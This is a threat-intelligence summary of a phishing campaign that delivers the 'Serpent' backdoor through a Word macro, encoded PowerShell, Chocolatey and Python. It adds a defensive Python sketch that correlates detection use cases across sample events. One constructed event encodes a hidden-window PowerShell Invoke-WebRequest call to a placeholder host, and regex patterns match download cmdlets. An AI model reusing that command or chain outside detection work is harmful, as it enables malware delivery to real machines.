Serpent Backdoor Malware
Industry: N/A | Level: Tactical | Source: ProofPoint
Research from Proofpoint identifies a phishing campaign aimed at French entities in the construction, government and real estate industries. The campaign uses a Microsoft Word document with an embedded VBA macro; the "Serpent" name comes from the ASCII art of snakes that appears in various sections of the macro. After the user enables the macro, it connects to a URL hosting a base64-encoded PowerShell script. That PowerShell script downloads and installs Chocolatey, an open-source package installer, and uses it to install Python. The chain ends with a Python script executed from a .bat file.
- Anvilogic Scenario: Serpent Backdoor Malware - Attack Chain
- Anvilogic Use Cases:
  - Office Binary Download Remote File
  - Encoded PowerShell Command
  - Invoke-WebRequest Command
  - Python Execution
  - Package installation
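As an added illustration of how the use cases above correlate into the described chain (example code written for this summary, not Anvilogic or Proofpoint detection content), the following runs simple process-creation checks over constructed sample events; the host names, paths and URL are placeholders, and the label names mirror the use-case list.

```python
import base64
import re

# Constructed process-creation events (not real telemetry) modelled on the chain:
# Word -> encoded PowerShell download -> Chocolatey installs Python -> .bat runs python.
SAMPLE_EVENTS = [
    {"host": "ws01", "parent": "WINWORD.EXE", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -EncodedCommand " + base64.b64encode(
         "Invoke-WebRequest -Uri http://example.invalid/s.ps1".encode("utf-16le")).decode()},
    {"host": "ws01", "parent": "powershell.exe", "image": "choco.exe",
     "cmdline": "choco install python -y"},
    {"host": "ws01", "parent": "cmd.exe", "image": "python.exe",
     "cmdline": "python.exe C:\\Users\\Public\\run.py"},
]
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}

def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), else None."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None

def classify(event):
    """Return the set of use-case names (from the list above) that the event matches."""
    labels, cmd = set(), event["cmdline"]
    parent, image = event["parent"].lower(), event["image"].lower()
    decoded = decode_encoded_command(cmd)
    # Inspect the decoded script when present, otherwise the raw command line.
    downloads = re.search(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile", decoded or cmd, re.I)
    if decoded is not None:
        labels.add("Encoded PowerShell Command")
    if downloads:
        labels.add("Invoke-WebRequest Command")
    if parent in OFFICE and downloads:
        labels.add("Office Binary Download Remote File")
    if image in {"choco.exe", "chocolatey.exe"} and "install" in cmd.lower():
        labels.add("Package installation")
    if image in {"python.exe", "pythonw.exe"} and parent in {"cmd.exe", "powershell.exe"}:
        labels.add("Python Execution")
    return labels

def hosts_matching_chain(events, required=3):
    """Hosts on which at least `required` distinct use cases fired, i.e. the correlated chain."""
    seen = {}
    for ev in events:
        seen.setdefault(ev["host"], set()).update(classify(ev))
    return sorted(h for h, labels in seen.items() if len(labels) >= required)
```

Single use cases such as a Chocolatey install or a Python launch are common in legitimate administration; the value is in requiring several of them on one host within a short window.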